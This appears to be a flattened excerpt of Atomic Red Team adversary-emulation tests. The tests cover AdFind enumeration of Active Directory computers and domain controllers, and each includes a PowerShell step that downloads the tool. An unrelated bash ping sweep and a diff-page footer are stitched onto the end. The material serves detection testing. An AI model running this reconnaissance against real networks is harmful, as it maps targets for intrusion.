Adfind tool can be used for reconnaissance in an Active directory environment. This example has been documented by ransomware actors enumerating Active Directory Computer Objects
reference- http://www.joeware.net/freetools/tools/adfind/, https://www.fireeye.com/blog/threat-research/2019/04/pick-six-intercepting-a-fin6-intrusion.html
supported_platforms:
- windows
input_arguments:
adfind_path:
description: Path to the AdFind executable
type: Path
default: PathToAtomicsFolder\T1087.002\src\AdFind.exe
dependency_executor_name: powershell
dependencies:
- description: |
AdFind.exe must exist on disk at specified location (#{adfind_path})
prereq_command: |
if (Test-Path #{adfind_path}) {exit 0} else {exit 1}
get_prereq_command: |
Invoke-WebRequest -Uri "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1087.002/src/AdFind.exe" -OutFile #{adfind_path}
executor:
command: |
#{adfind_path} -f (objectcategory=computer)
name: command_prompt
- name: Adfind - Enumerate Active Directory Domain Controller Objects
auto_generated_guid: 5838c31e-a0e2-4b9f-b60a-d79d2cb7995e
description: |
Adfind tool can be used for reconnaissance in an Active directory environment. This example has been documented by ransomware actors enumerating Active Directory Domain Controller Objects
reference- http://www.joeware.net/freetools/tools/adfind/, https://www.fireeye.com/blog/threat-research/2019/04/pick-six-intercepting-a-fin6-intrusion.html
supported_platforms:
- windows
input_arguments:
adfind_path:
description: Path to the AdFind executable
type: Path
default: PathToAtomicsFolder\T1087.002\src\AdFind.exe
dependency_executor_name: powershell
dependencies:
- description: |
AdFind.exe must exist on disk at specified location (#{adfind_path})
prereq_command: |
if (Test-Path #{adfind_path}) {exit 0} else {exit 1}
get_prereq_command: |
Invoke-WebRequest -Uri "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1087.002/src/AdFind.exe" -OutFile #{adfind_path}
executor:
command: |
#{adfind_path} -sc dclist
name: command_prompt
for ip in $(seq 1 254); do ping -c 1 192.168.1.$ip -o; [ $? -eq 0 ] && echo "192.168.1.$ip UP" || : ; done

Some files were not shown because too many files have changed in this diff Show More